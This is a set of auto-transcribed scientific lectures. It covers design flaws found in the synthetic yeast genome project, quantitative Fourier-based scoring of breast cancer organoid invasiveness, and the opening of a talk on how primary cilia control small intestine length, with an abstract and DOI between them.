now here is actually a real systematic problem that we had. So I mentioned that we replaced the telomeres with a universal cap. And what we found is that, so the telomere is silenced and then there's an insulator that keeps the silencing from going into the sub-telomere and then into the regular chromosome. And what is happening in the synthetic chromosomes is that the silencing is extending further than it should. So that's happening for two reasons. One is that probably our silencing sequence in the telomere cap was not sufficient. The other is that since we got rid of a lot of the sub-telomere junk, or I guess, you know, maybe it's not junk, we got rid of a lot of the sub-telomere pseudogenes. And they sort of were a buffer in the wild type chromosome that if silencing extends into the pseudogenes, that's okay, but since we got rid of that, then it's easier for the silencing to extend into the real protein coding genes that are used. So probably what's going to have to happen is systematically replacing the so-called universal telomere cap with a new and improved universal telomere cap. So that's on the way. So another problem that we have, oh, does someone just, no, is that, so these loxp-sim sequences that we put in for recombination, so they're completely stable once things are integrated in the chromosome. But the problem is that one of the steps for integration and assembly is homologous recombination, of putting in synthetic DNA, and it's supposed to, you know, land where it's supposed to land and get rid of the wild type DNA. But the loxp-simsites can seed homologous recombination, and then what we get is sort of a misassembly. And these are easy to catch, but the problem is that we didn't put catching them into our workflow until they got sort of further along, so we didn't catch them as quickly as we should. So this isn't really something that we could have fixed because just having the loxp-simsites in there causes this to happen, and we wanted them in there. So it's more that our process just should be improved to look for offsite homologous recombination. It turns out, however, that there are two problems with the loxp-simsites that we found where we put them, so loxp-simsites were inserted into the 3-prime UTR of every non-essential gene, so there are about 1,000 inserted to date, and two of them affect the promoter of a neighboring gene through a mechanism that we're not really sure of, except that we know it's because we put the loxp-simsite there, because when we take it out, then the problem goes away. So it's unclear how to predict these, so unfortunately knowing this, it wouldn't really have changed how we did the design back then. But would it change the way that you go forward? No, because we've tried and tried and tried, but we haven't found any good way to predict why it is that out of these 1,002 of them have this effect. So there's nothing. So what's the effect? Oh, the effect is that I think it is the fitness defect due to down-regulation of the neighboring gene. So it's transcriptional. You pick it up on the profile? So we pick it up two ways. We pick it up one way that we see the cell as a fitness defect. We pick it up seeing that the transcript is expressed below the level it's supposed to be, and then we cure it by getting rid of the loxp-simsite, and that was when we decided that was enough work done on the project. So yeah. Did you correct the... Yes, yeah, yeah, because these fitness defects, they're not big. Do I mean the mutant genes, like half one that are in the reference train, did you correct those as you went along? Oh, the mutant genes that are in the reference train. There's a bear, you know, there's a dozen or something, and it... I'll have to ask Jeff. That's a good question. No one's ever asked me that before. I never thought about it. They make a huge difference to the fitness of... So the reference train is a mutant. So we're not... So this isn't based on the reference. I think this is based on a BY? Yeah, that's what I'm talking about. BY4741? Yeah. I'll have to ask Jeff. Okay. I should make a note of that. Yes, very helpful, but we need to... I'll still bring it home by 4, don't worry. All right. So synonymous recoding. So here again, so these are the watermarks we put in. So we put in... So we recoded 60KB synonymously. And out of the 60KB, so 60,000 bases, three of them cause problems. One, it's completely unclear to us still why it causes a problem. And another, we create a stem loop in the PRE4, P-R-E4, mRNA. So possibly we could have avoided it, but if we worried about every stem loop, we would have made... I don't know if it would have been worth the trouble. And then here, this is a real one that probably we maybe should have been smarter about. We created a RAP1P binding site in a transcript, which causes the transcript to be repressed. So possibly we should have screened more for creating RAP1P binding sites. So go... So do you put the watermarks inside coding regions? Oh, yeah. That's the only place we put them. Because we don't know anything about gene regulation. All we know about is the genetic code and that if we have the same codons, we'll get the same protein. We try to avoid putting PCR tags into the very five prime region of a gene because there's lots of evidence that that codon selection is chosen to melt structure and make it easier for the ribosome to have an on-ramp or whatever people say. So we just... We try to avoid that. Otherwise, we just go wild on the protein coding region. So going forward, maybe we're going to incorporate these in the next design. But looking backward, there's a trade-off between experimental and computational effort. And probably it ended up being more efficient just to do what we did. And then have the wet lab people fix the couple bugs that's sneaked through. So I say that as the computational person. So our total bug count, WaxP SimSites, a thousand added two bugs, PCR tags, 60 kb of tags, three bugs, stop codons. So no fitness defects in the stop codons. Synonymous coding, 5,000 bases, no bugs. TRNA deletions, no unexpected bugs. And then repeat deletions I didn't even mention. So far, no fitness defects from getting rid of any of the repeats. So to me what this means is we should have been more aggressive in our design. That synonymous coding has 5 times 10 to the minus fifth bug rate. So the design choice that I was pushing for, that Jeff said no to, was to pick some of the other low-frequency codons. So low relative synonymous codon usage. And get rid of them also. So typical low-frequency codon, fewer than 10% of the codons for that amino acid use that codon. So 30,000 to 70,000 occurrences of low-frequency codons. So for each of these amino acids that we recoded, we would have maybe introduced three to five fitness defects genome-wide that I'm sure we could have gotten back. Yes? Why is not a sharp number? Why what? Why you have a range of occurrences? Oh, because it depends on the amino acid. So you have to multiply the RSCU by the number of amino acid occurrences of that amino acid to get the number of occurrences of that codon. And they're also about 10%. So I'm not telling you what codon it is or what amino acid it is. It's just like, that's sort of the typical range for low. There are like three or four of them, maybe five of them in the genome, in the yeast genome. So something that really shocked me is how few execution errors we had in terms of getting an email from Jeff that we have to spend money on nucleotides by the end of the month and we need to quickly get this water done and a lot of code that was written once and run once and then never touched again, that actually like very low human error rate, much lower than I would have expected. Annotation errors. So something that caught us at the very end when we were trying to get papers submitted is that we tried to upload our synthetic genome sequence and annotations to GenBank and it got rejected. And it didn't get rejected because of anything we had added. It got rejected because of the legacy annotations from the original yeast genome annotation that in between when that first genome sequence was submitted and when we did this, GenBank improved its syntax checker and then rejected something that had, you know, some of the reference stuff that it had accepted before. So probably we should have been using the GenBank table to ASN checker. So that wasn't really our mistake but it's like one of these things. So as Charlie mentioned that I wasn't aware of that, you know, the mutations in the reference sequence, like here's a mutation in the reference annotation that we had to fix. So we haven't fixed the sequence maybe but we have fixed the annotation. All right. So challenges in genome design. So for mammalian, so now there are a lot of people interested in doing similar projects in mammalian. And so we're interested in that also but mammalian is much more challenging for a lot of reasons. My only insight based on yeast is that I wouldn't, you know, I wouldn't worry after designing all these yeast chromosomes and, you know, seeing how well they worked, I wouldn't really stress out too much about getting the design perfect. I think it's better just to sort of start and see what works. All right. Yes. What I understand is you clean up a little bit the yeast sequences. I don't understand where is the new stuff. What new stuff? Well, what you did is you took the natural sequence. Oh, the stuff I'm not talking about is the loxopiesome sites and having the chromosomes programmed to rearrange in different environments and explore diversity space by generating lots and lots of very closely related genomes that then wander around in genome space. Yes, I'm not talking about that. And if you would put this new yeast in a natural environment, would they out compete? Well, I'm not sure they would really have so much fitness defects compared to regular yeast. The value is that it's very fast evolving in terms of copy number. So it's, so they're very useful to evolve pathways. So or live in stress conditions that you turn on this recombination system and then it will increase copy number of things that should be increased quickly. It will decrease and it will be locked into the genome. So it's been very useful for that. More important, can you still bake with it? So the answer is yes, but the IRB won't let us eat the bread. One of the projects of our, so like there are groups that have, schools have iGEM teams to do synthetic biology. So one of our teams put beta-carotene synthesis into yeast to have yeast that was going to be enriched for, so carotene starts with a C, but unfortunately it's vitamin A. So that they're enriched. And when you grow the bread, well when you bake the bread it smells a little like carrots, but the IRB told us specifically no tasting the bread. It's got DNA in it. When you measure fitness it's in a specific environment. Yes. So usually we're talking about fitness and, well fitness was measured at like three or four standard environments, like regular temperature, I think higher temperature to look for higher temperature fitness defects, a couple other fitness, but you know we didn't probe it over a ton of fitness conditions. How long have they been grown? Ah, since, so different, so different strength, like I think we got our first chromosome, the first full chromosome was 2014 maybe. So are they evolving? No, no, no, I mean no, they have the same mutation rate as a regular cell, which is like one, usually it's like one mutation per generation. They're not really, you know, they're not, and the Loxpea Sim sites are completely stable in the absence of Cree expression. There's nothing, like they're no more, they're no less, well they're no less, they seem no less stable in the wild type yeast and hopefully they're more stable because of the tyrannone chromosome, hopefully. All right, so thanks to funding NIH DARPA NSF on Erison Bio. And now I want to tell you in the 15 minutes, is it really 15 minutes? Because I started late. And there are some questions. You have a little bit more, yes. All right, I want to... But still we think about one hour this question. Oh, yes. So together this... That's right. Yes. So about 15 minutes it's okay. All right, I just want to show some math slides. So I did not know before I started working on this, so this is a cancer project. I did not know before working on this project that for breast cancer it's not the tumor that kills people, it's the metastasis. And that therapies to get rid of the primary tumor are not really effective at all if the tumor is already spread. So five-year survival for local or regional breast cancer is very good, but metastatic cancer, once it's spread, is only 26 percent. This is very difficult to study. So here's sort of a picture of what metastasis means is that there's a group of cells in a tumor and the cells are colored suggestively to show different cell fates in a tumor. So the same way that normal cells in the body have different cell fates, there's sort of a growing theme in cancer biology that different tumor cells have different fates that may have to do more with changes in, you know, epigenics and transcription factor circuits as opposed to somatic mutations. So the same way that we have different cell fates in our normal cells because of cell fates choice, there seems to be similar cell fates choice in tumors. Part of it might also be differences in somatic mutations, an open question. So here colored suggestively are the blue cells that sort of lead an invasion and then the red cells that are more proliferative that follow along and then they see it a secondary site and then the more proliferative cells sort of outgrow and the more invasive cells are still there. So that's the type of picture. So some evidence for this, Andy and I published recently using different protein markers. Yes. I just want to point out that K14 may be required for the dissemination but it's not required. It's actually disappeared after the tumor in the secondary site. Yes. So that's what this picture is supposed to show that exactly that. That these are colored blue and his experiments are expressing K14. That clusters circulating tumor cell clusters look like they're mixtures of K14 expressing K14 non-expressing and then as it grows out, we see the outgrowth of the non-K14 expressing. With still some K14 expressing but it goes and it's not clear whether it's this cell outgrowing or whether there's sort of a switching between different lights. I think that's a very interesting question. So metastasis has been challenging to study in vivo for a lot of reasons. You can, oh, but with recent funding, we're really excited about studying it in organoid systems. So particularly I should thank the NIH Office of Cancer Genomics, the Cancer Target Discovery and Development Program and then seed funding from Ted Giovannis Foundation and then Breast Cancer Research Foundation and some supplements and seed funding we had. So here's my experimental partner Andy Ewald who's in cell biology and oncology. He'll be recruiting 25 breast cancer patients a year for the next five years working with the director of breast surgery who consents the patients on the way in and the pathologist who hands off the samples to us, Edward and Ashley. And then the most important thing about the trainees working on this are that in blue is every French connection. So Andre of postdoc in my lab trained at University of Pierre-Marie Curie, Parisis, LOD and Eloise have just joined the group from Bordeaux and from Nice. And then Hildre and Matthew, they're not from France but they're from the next best place Canada. So that's the team. And the method that we're using is organoids which are just these, so this intriguing model that is very complementary to doing in vivo work in an animal model versus doing cell line work say with human cells. It's very nice, it's a human model. It is clumps of cells grown in a 3D matrix that then behave like many organs. So here's a picture of a mouse organoid prep of taking the mouse mammary gland and then these are 300 to 500 cells, so that sort of size. So in a normal individual for breast tissue they self-organize into what looks like a mini milk duct with a luminal layer and a basal layer. And if you look at them under a microscope from normal tissue they just sort of sit like that and don't do much. So what got me so interested in this project is looking at these movies of organoids invading. So this is an assay where this group of cells is put into 3D media and it starts to invade and adjust it really. So it just caught my interest because I had never really thought about, I always thought about cancer as a cell division, not about this. And so I really wanted to understand this phenotype and for me understanding the phenotype means like I'd like to put a number on it. That makes it easier for me to do any sort of statistics. And up to now really the numbers have been someone looking under a microscope and saying oh that's non-invasive, that's a plus, a plus, plus, a plus, plus, plus. So I wanted to do something more quantitative. So looking at these, I've looked at, I don't know, probably several thousand organoid pictures. You see different patterns with your eye and I'll show some of the patterns later on. But looking at the patterns it just seems like if we could use machine vision, machine learning methods to do clustering of the patterns then different patterns probably correspond to different types of pathways that are being activated and then we can dissect different things that are going on. So and looking at these thousands of pictures I could sort of see patterns but I wouldn't really trust myself to put things into groups. And this is, you know, this is if we had a quantitative set of features to say here in numbers is what this sort of picture looks like then we could roll out all of the tools of machine learning statistical analysis and whatever other word of the word. Of the moment we want like deep learning. We could use deep learning on it. So all right. So the quick math interlude is what we're doing to characterize the shapes quantitatively is, oh so this is sort of washed out but there's like imagine if you would the contour that should be shown if there's a sort of smooth contour for an organoid that if you put a point in the center and then trace the radius as a function of the angle you get something that's almost constant if it were a circle it would be constant and then it's periodic because if you go around more it repeats so that means you have to Fourier transform it. And then if you Fourier transform that you'll get if it were completely flat only zero frequency component you get sort of you know if it's a more complex shape you get something more complex if it's really complex you don't get a function anymore because the if you have a really complex shape the array from the center can intersect in multiple points. So instead the trick is to make a parametric curve of the x and the y component separately as a function of the contour length. And then so I was really excited when I found that with keynote you can use latex but I don't know any of the math or any of the mathematicians I don't know. This is baby math. Anyway so what we do is we so Vina Andy's high energy like really patient graduate student spends hours tracing the organoid boundaries because segmenting the organoids is a pretty hard problem for us and I don't have to solve that problem because we have Vina. So she traces them and then I take those points I interpolate them I do Fourier transforms the zero frequency component of the transform is just a center of mass so I ignore that and then we get these images so then sort of in light blue you can see that's a round shape in real space and then in Fourier space that's pretty much just a flat line no spectral power and then here's a real organoid boundary that looks like a spaghetti monster and then when you transform it you get higher frequency components. So we do other steps we normalize it so what that means is if you zoom in or out then the Fourier components change with the zoom level by a constant scale and we don't want to say something's more invasive just because we had a like a higher number on the microscope so we scale out the size by normalizing to the first Fourier component and then we do a smoothing operation so when I was a graduate student I used cosine filters all the time but I never knew where they came from until when I worked on this project where so what happens is that if you have like a zoomed in picture of something you see pixelation and then if you trace a boundary with pixelation you don't get a smooth boundary you get like a jagged staircase so you can fix that by remapping all the points to the center of each segment so then if you had a staircase then you get a 45 degree angle ramp so that's the smoothing operation and that in Fourier space gives you a cosine filter so we throw on a we slap on a cosine filter and then so something else you can think about so mapping the two points to the center of the segment that's an average and sort of the opposite of taking an average is taking the difference between the two so if you take the difference it's like a local derivative and it turns out in parametric space if you take the difference it ends up giving you the curvature so we essentially weight the Fourier modes by a factor of k squared but if you do it right discreetly it's a sine filter so we throw on a cosine filter and a sine filter get a weighted spectral power and now if you give me the image of an organoid I can tell you with a number how invasive it is which is exciting for me because then that means that I can do all the sorts of work that people have done for complex traits so all the classic statistical genetics that people have done now we can do for this phenotype and people always talk about tumor heterogeneity and so here we're actually characterizing it so this is just like population genetics except that instead of looking at heterogeneity of different individuals in a population we're looking at heterogeneity of like different little groups of cells within a tumor so I'm so excited so here are the results from 800 organoids from 52 different tumors grown for 6 days and I learned how to so when we only had seed funding it was me and my python interpreter doing all the work so I learned how to like put together these thumbnail pictures so I'm very proud of figuring out how to do that so each of these little blocks is a different organoid in false color because if you give python black and white it says oh you gave me black and white but color is much prettier so it doesn't in color but if you give it a color image where you have all three color planes and they're the same it gives you grayscale so that was very confusing for me for a little bit that all of my grayscale images were coming out in color and all my color images were coming out in grayscale but I figured it out alright so here what I'm doing is these are the so each of these columns are organoids generated from a different person's tumor so there should be 52 columns one for each tumor and what I've done is I've stacked them from least invasive to most invasive and if you got up closer I think you would see that you would agree with for the most part with the way that my algorithm ranks them that at the top they look more invasive at the bottom they look less invasive and then this is just a false color scale so within each tumor we're seeing heterogeneity so we have within tumor heterogeneity that in a given tumor some organoids generated are less invasive some are more invasive and then what we'd want to do eventually is to take these organoids from a single individual and say what's different between these less invasive and more invasive organoids let's characterize them by RNA seek look at gene expression differences you know maybe we'll do whole genome exome sequencing to see if there are somatic mutations that make them different I'm not so convinced also we have between tumor heterogeneity so what I've done is I've essentially is the geometric average because that seems to like give a little nicer ranking for overall less invasive on the whole so this individual's tumors organoids are less invasive these are more invasive what we want to do eventually is to see if these correlate with patient outcomes breast cancer survival even even though on the whole it's bad still from primary tumor removal it's five or ten years to get good endpoints so we're going to be doing those correlations to see if the organoids are proxy for survival but those outcomes won't be for five to ten years also I can't guarantee that this study is powered to do that but we're thinking about other studies that would be more powered that are the question only our biologists you take a red spot yeah you saw I mean you disperse ourselves and restart the organoid do they repeat the phenotype did they repeat the phenotype well so what we're doing for that is is where's so so the so the phenotypes are not I'm sorry the organoids are not highly proliferative so they're not it's sort of there might be one or two cell divisions in this in the six days at most so it so we don't really have experiments like that up and running however we have mass genetic models where the phenotypes from one mass genetic model to the other are very reproducible so this point and you're sampling different bits of tissue yeah what they are doing here for a trogeny of the tumor you're taking different part of the tumor and get organoid that behave differently yes but I think that every organoid has a trogeny in itself yes you will be able if you do single cell on this organoid you will be able to identify the population of cells within the organoid that metastas I agree that is in the plan the problem is so I was talking to I think the person who spoke earlier in this session about the C. elegans single cell stuff is if we do single cell mapping back from the single cell sequence results to geographically spatially where it came from in the organoid so what we're doing as a start is we've got plans to laser capture micro dissection so you can actually eventually and reach for these cells the metastas and put them back into organoid or put them back into a new demise for example so we're so I think we have like experiments like that planned but we should probably talk after that we did that in the mouse and it's amazing you can see clearly what population is the metastasizing population of cells so we want to so I want to I would I'm really interested in circulating tumor cells so that I think like that is probably where we're gonna one of the directions we want to go is empty markers for example yes or not or not right empty the one that metastasize you will find proteases that induce so what what subtypes of this you say that no I didn't say what cancer subtypes they are because I'm not you use all the yeah we're just doesn't matter triple negative I'm not very different yes you're different I understand that I said these these experiments were done with pilot funds where we were sort of taking tumors on the way in now that we have real funding we can do it more systematically invasiveness is not a surrogate from metastasis I agree cause you know us are invasive by definition that's what makes a carcinoma different from an adenoma adenoma forms an organoid that is completely spherical and adenoma is defined as a noninvasive tumor cause you know us are invasive but most cause you know us are not necessarily metastatic and in breast cancer you can have metastasis occurring 20 years after treatment which is due to dormancy and there's no evidence that the metastasis originates from the circulating tumor cells a lot of it is totally hypothetical so I'm you can address that okay you can take I'm the math guy you can address that easily actually you can address that easily if you find an organoid that invades you can put it back into nutmite and then you will see if they metastasize it a mouse doesn't mean the metastasis is the best you can do if you've done we can just continue this discussion or otherwise maybe we will now let him talk so you have like three minutes to show you your talk and then yeah I will show like this and then one fun slide all right so here so I completely so I agree invasion is not metastasis they're also in dissemination so like we can't get metastasis in 3d culture instead the closer phenotype might be might be dissemination also Andy is working on entravization phenotypes where it's a co-culture with epithelial cells that are you know that look like a like a blood cell and seeing the tumor cells squeeze in so that's like that's that's his work that's going on what since since we mentioned k14 earlier what we're starting to do is a standard population genics type tests to do within tumor between tumor tests of association so here so here you're actually are phenotypes of of invasion without dissemination either as a single column or a collective invasion here actually is more dissemination without invasion so this is a I think this is the I forget exactly that says C3 one tag where individual cells are pulling off and so this sort of this sort of organoid actually has a very round boundary not invasive looking but it's like water molecules boiling off of a water droplet as the individual cells crawl off but what's constant in all of these is that the leading cells are expressing k14 possibly pulling themselves to the matrix and so we so we actually have the so Andy stain for k14 because he's so interested and then we did regression tests of k14 versus our invasive phenotype and so here's a correlation for an individual tumor measuring the difference in k14 versus baseline and difference in invasion versus baseline and a strong correlation p value of 10 to the minus 42 so so what we want to do now is do this genomically for you know transcripts proteins and also do things that are sort of really more tied to the biology all right yes I think the k14 is true only for the PR negative I'm I think we should so I have to go to see whether we actually are consented to look at the ER status of the organoids that we've done so far I think I mean we're consented for some things but not for a lot and actually one of the things that I have to be working on is our IRB all right two more slides two more slides so first so thank you so I want to show some of the family's French connections so this was our this was my wife's dog actually before we got married but then the dog adopted me born in France so so there's my family so thanks to my family for letting me come here so my wife had has a matrice from Patel in Sirban admitted to the French bar so Ezra was born in the 17 so these two kids are being brought up Francophone my daughter's favorite food is ponch chocolate and this is this dog a three-quarter French poodle and that's our new puppy Ophily so there sort of washed out so she's only three-quarters she's a Labradoodle so she's one-quarter Labradors three-quarters yeah and there we go all right so thank you and they let me travel anyway so metastasis extremely important difficult problem as a math guy it seems to me that working backward from the genetics of them and then all the metastasis is the better approach because they're easy know that some part of the genetics of the metastatic tissue is reflecting the process of metastasis maybe only a small part but so there are two problems with that one is if say say that there's EMT then with EMT comes MET so the back transition and so what if what you're looking for is actually a transient that is only expressed by the cells as they're mishastocizing but then when they regrow either you lose that cell type because it's a small cell population or you lose it because there's an MET transition so looking at the metastasis might not be very helpful your argument is fair but looking before metastasis essentially opens you up to any possible so that's why I'm so excited about methods to look at cells as they're traveling through the body however there's also a very low success rate for circulating tumor cells for reseeding so it's like if we're an easy problem it wouldn't be open to work on. I have a question. Well the biggest problem is actually a tactical problem because when patients die from metastatic tumors they hardly do any resection of metastatic tumors so what's available in the lab for people like you and me. So we have so yes and no we have a great program like that at Johns Hopkins and pancreatic where in pancreatic they at least my understanding because that they take out anything else that they find like as autopsy. Ralph Rubin he mostly has primary tumors because when patients die from metastasis there are very few places that actually pay for the autopsy and you have to do special program worn by the autopsy to really excise the metastatic. So we have a program like that in pancreatic. The problem in pancreas is that by the time 90% of the patients are diagnosed they already have metastasis so and we still don't know what's the genetic difference between metastatic and non-metastatic tumors. Despite so many years of research and so many cancer genomes have been sequenced we still don't know that. Yes I'm so surprised like I always thought oh there's this wealth of data but almost all of it is primary tumor and also the sample numbers my picture was oh these days everybody who has cancer diagnosis gets their tumor sequenced and the answer is no and maybe they'll run a foundation panel of 50 or 100 and even that ends up really not being so helpful for therapy choice and so it's really so that's why I have to get hard to work on our IRB to be able to and also usually the consent doesn't allow follow up so it's not as far along as I had imagined when I started. Now by the time somebody is dead there's nobody to send the consent for. Okay if you don't have other questions we will thank again our speaker.
|
Computational design of DNA sequences with defined function is a goal of synthetic biology, but we still lack crucial information required to construct objective functions reflecting reality. Thus, much work in synthetic biology still relies on synthesize-and-screen rather than design-and-build. Because of known unknowns and unknown unknowns, design challenges at the genome level require tradeoffs between the benefits of more ambitious designs and the risks of fatal flaws. The complete synthesis of the yeast genome by the international Saccharomyces cerevisiae (Sc2.0) consortium has reached a milestone of 3.5 MB out of 12 MB finished in the form of entire synthetic chromosomes replacing their wild-type cognates, which in turn provides a first opportunity to characterize design flaws. We provide an overview of our mistakes, including both systematic errors and random failures, and discuss how we would have revised the design had we known then what we know now. Ageneral conclusion is that our bug rate was very low, about 5x10^-5 in fitness defects per bp changedin protein-coding regions, and that our design was much more robust than we had anticipated.
|
10.5446/50891 (DOI)
|
A couple of disclosures. I have no financial conflicts of interest. In the U.S. we always have to disclose that. Secondly, I have bad hearing. I can only hear in my left ear and I have a hearing aid here which doesn't work very well. Third, I have terrible back problems. I'll be happy to show you my x-rays and MRIs afterwards. So it means that I have to lean on something all the time and we'll probably have to sit down. When I teach, I have occasionally gotten, so in the U.S. when we teach we get all those feedback from students and we're evaluated on that. And I have occasionally gotten feedback that I was so bored with my teaching that I was sitting in my lectures. So it wasn't that I was bored, it was just that I was in pain. So I have a question to begin with. I know that this is a very famous institute for mathematics and I was told by one of the chairwoman of this session that the mathematicians, some of the audience are actually famous mathematicians or young mathematicians who were very bored with what they were hearing about biology. How many people, maybe I could get a show of hands, are mathematicians or non-biologists? There are no mathematicians or physicists or anyone like that. Can I go see if they're in the lobby? Can I teach an applied math course? Sorry? I teach an applied math course. Are you a mathematician? No. Not a pure one. But applied math is fine, I don't care. I'll take that. So I'll give you a little bit of personal math background. So I'm not a very good mathematician at all. You're coming. I have one. You're a mathematician, sir? Yes. Okay. So I'll give you a little bit of another mathematician. They brought in some ringers. We don't have a, more, more, more, more. Do we have a minion? There's a dog also. More mathematicians and a mathematical dog. Good, good, good. So I was, as I was saying, I was told the math, I know, I was saying before you people came in, ladies and gentlemen. I know this is a very famous mathematics institute. I know about famous, I've had a lot of mathematician friends. I know about Borbaki. And so I myself am not a good mathematician, but I have, so my father, my late father was a fairly good mathematician, not, not, or he was a physicist. He got his PhD in physics from Columbia in 1951. He's been long dead. So I can tell you that he grew up in New York City and in 1939 he was captain of his high school math team that won the New York City Mathematics Championship for high school. And so he got his PhD in physics from Columbia in 1951 and was a postdoc at the Courant Institute. So I imagine you know what that is. And so our two old, I have three children, our two older ones are not at all interested in science and they weren't good mathematicians, but our 14 year old is very good, much better than I ever was. So next year I know he'll be taking calculus, which is pretty good for a 14 year old I think, much better than I was. I didn't take calculus till I was 16. So anyway, and so I know something about mathematical talent that I don't have it, but some of my relatives did. So my name is Mastov, there's a George Mastov, the Mastov-Rigidity, who's probably related to me. He passed away in... Pardon? I think you mean Jed Mastov is W. Yes, but they're all translated from the Cyrillic and back in those days it was usually translated with a W or an OFF when they came over the immigration in Ellis Island. It doesn't matter. They're all shortened, it was a Ukrainian name, Mastovoy, and it was all shortened from that. It's a Ukrainian Jewish name. So it doesn't really matter how it was translated. I have letters in the original Cyrillic, Ukrainian, or Russian, and I studied Russian in school so I know how it was translated. It doesn't matter how it's spelled in English. Okay, so I know about the... I don't really know the details of the Mastov-Rigidity. He passed away two years ago, but we're probably related. I'm told that all Mastov-Oys are related. So who's the... Sorry? Time's up. Time's up. Pardon? It's done. Okay, well that's the most interesting result I have to say. Now for the rest of you, my talk only takes 35 minutes. And I started... I got up here at 306. For the rest of you, many of you in the audience know me as a cell biologist. I grew up, I was a student of Gunter Blobel who passed away three weeks ago. I know me in the membrane traffic field, and I'm not going to talk about membrane traffic at all. I'm going to talk about classic... Straight-up developmental biology, which most... Many of you are probably not very familiar with. So I have a lot of background, including some bioengineering and geometry. So I'm going to actually talk about geometry today. Classic Euclidean geometry. So this work was all done by Yang Yang, a postdoc in my lab in collaboration with Jeremy Reuters lab at UCSF. And the overview, this is all work that's known. Most internal organs in metazoa are made of epithelial tubes. Tubes have a characteristic length in diameter. The control of length of the small intestine, which exists in chordates, vertebrates and related, have a characteristic length, and it's a fundamental and almost completely unsolved problem. Most people aren't even aware of it as a problem. And the control of epithelial tube length in general in vertebrates is a largely unsolved problem. And there's a clinical correlate, a short bowel syndrome, a severe disease of intestinal length, which is an unsolved problem clinically. Now the new data to summarize is that surprisingly primary cilia, and I will explain everything in here, that this talk, an earlier version of this talk a year ago was designed for UCSF faculty lunch, which includes mathematicians for this chemist. So I'll explain every term in here. Surprisingly primary cilia control small intestine length through the hedgehog signaling pathway. The loss of function of intestinal cell kinase, which is a poorly understood kinase, and it's a cilia gene causes short intestine. Other cilia genes also controls intestinal length. And hedgehog signaling, they work through mechanical forces involving smooth muscle actin and YAP, which is abbreviation for YES associated protein in mesenchymal cells. I'll explain every word in here, so don't worry. So we're going to start with one of the simplest metazoas. Metazoa means simply multicellular animals as opposed to plants or single cell organisms. And so one of the simplest, one of my favorite organisms is Hydra, and, excuse me, related things like jellyfish. So basically this, can we have the lights down a little bit? So Hydra are one of the simplest types of metazoa, they contain two tissue layers, they have an endoserm which lines the interior cavity, they basically have an interior cavity, and they contain an ectoderm which lines the external, external, these are both layers of epithelia, that is a single layer of cells that form like a layer of bricks, okay, and they have some loose cells in between neurons. This is from a standard textbook, and by Bruce Albert, one of the original great textbooks of cell biology in 1983. I'd just like to mention in 1983 I was still in grad school and completely unrelated work of mine was in this book, so it's always very gratifying that when you're still in grad school your own work is in the book, but it's not related to this story. Okay, so most internal organs in metazoa are made of epithelial tubes, and so just to give some examples, this is a cast of the branching airways into a million lung, this is a diagram of the branching tubes that make up of the million kidney, this is a diagram of the branching tubes that make up the circulation of a human being, and this is the diagram of the airways that make up what's called the trachea of the embryo of a fruit fly from Marc Krasner's lab. This is the only one where we understand how it's formed, but it's formed in a completely different manner than all the ones in mammals, for instance it's not involved, it's formed without any cell division, so it's a completely different way of forming things. Now we're going to focus today on one model system, which is the human digestive system, which those of us who ate lunch a few hours ago, that lovely buffet, we started by chewing our food in our mouth, then it went down our esophagus and into our stomach, and then our and small intestine, and our large intestine, and out the anus and the rectum, and that is really one continuous tube. I went to medical school once upon a time for the one simple reason that I was a good Jewish boy, and in the United States in a certain period every good Jewish boy went to medical school, and those of you like Dave Drewbin here who failed to do that probably disappointed their mothers. I wasn't smart enough to be a physicist like my father. I should add, when I was in graduate school, I was a government funded MD-PhD program that the US government likes to fund, when I was in grad school, when I was around 23 or so, I managed to sort of explain to my father, the physicist, what I was working on, and he had one comment to me, which was, if you have to do experiments you must not be very smart, and he told me how he did his PhD basically, his whole thesis work in about six weeks, and the first week was doing the work, and the next five weeks was writing it down. So, and then he got my mother who was engaged to him, and knew how to type to come over to his apartment and type it up, and she said that was the hardest thing she ever did because there were subscripts to the subscripts, and superscripts to the superscripts, and his whole PhD thesis was about, I don't know, 30 or 40 pages. So, yeah. So anyway, let's continue. Now we're going to talk about mechanical engineering, because I got this figure out of a handbook of mechanical engineering, which is that every tube has a diameter, a wall thickness, and a length, okay, and that applies to the vertebrate gastrointestinal tract. We showed you that, but a schematic of that is we have an esophagus, a stomach, small intestine with different segments and a large intestine. This happens to be a diagram of a mature chicken, which is what I could find the diagram of in a textbook. But you'll notice each part here has a length. It's very characteristic and reproducible from one individual to the next, and a characteristic, a diameter and length. And what controls that? Why are they so reproducible from one individual to the next, unless you're mutant? How reproducible is our good data on how reproducible it is? I don't know that I have statistics that I could find, but I think if you have genetically homogeneous individuals, like in mice, humans are sort of outbred, although they're not really, in the grand scheme of things, they're not really outbred. I mean, if you have a 4 foot 6 person and a 6 foot 10 person, I'm sorry, I can't translate that into meters right now, but it's going to vary. But if you take inbred mouse strains, I think they're probably, well, I'll show you why it's not measured in a minute. So I'll tell you why we don't know exactly. But I think in an inbred mouse strain, they're probably pretty good. I don't know the exact answer. Now, I'll show you in a minute why we don't know. Very good, because if you have 10% change in intestinal length, you know you have inflammation if it gets shorter. Okay. So 10% change is a big change. Okay. Well, I'll tell you why we don't, why nobody measures intestinal length in the mouth in a minute. But I'll tell you the adult small intestine in both a mouse and a person, we know exactly how it's organized and exactly how we make it through the work of a lot of people, but especially in the last 15 years, the lab of Hans Klebers who's in Amsterdam. So this goes back really 50 years or more, but in molecular terms, the intestine, small intestine is organized in what's called encrypts, which are imaginations below the surface and that in the whole point of VLI is to increase the surface area because the role of the small intestine is to absorb nutrients out of the lumen. And you want a maximum amount of surface area. And we know though that how these cells are produced is that there are stem cells here. This is the best understood stem cell system in the adult, or one of the best understood stem cells in the adult, the other being in the blood. The stem cells turn over slowly and then their daughters go through what are called rapidly transient amplifying cells and they move up like an escalator up here through the VLI and they get sloughed off here. And this whole process takes three to five days and they're shed here at the VLI's tips and they go through differentiation process. They form four or actually five different differentiated types of cells as they go up here. One type goes actually backwards down and one of the remarkable things, the whole process, the control of this is very well known in detail, is that a single stem cell, if you kill off one of these systems and you transplant a single stem cell, a single stem cell can regenerate this whole cryptvillus unit. So we know about how this regenerates. So regeneration of adult organs is a major field of medicine. We all want to be able to regenerate missing organs and this is one example where you can do that very efficiently. Now development of this in the mouse or in the human is very well understood. It's much easier to study in the mouse because you can manipulate it genetically and you can go in and kill the mouse, study the mouse embryo at will. One doesn't like to do this in humans normally. And so in humans you have to depend on abortion or spontaneous abortion and so forth. But the mouse takes 20 days to develop from conception and you start to see around what's called embryonic, oops, embryonic day 13 and a half. You always deal with half days because you assume the mouse mates in the middle of the night and then you come in around 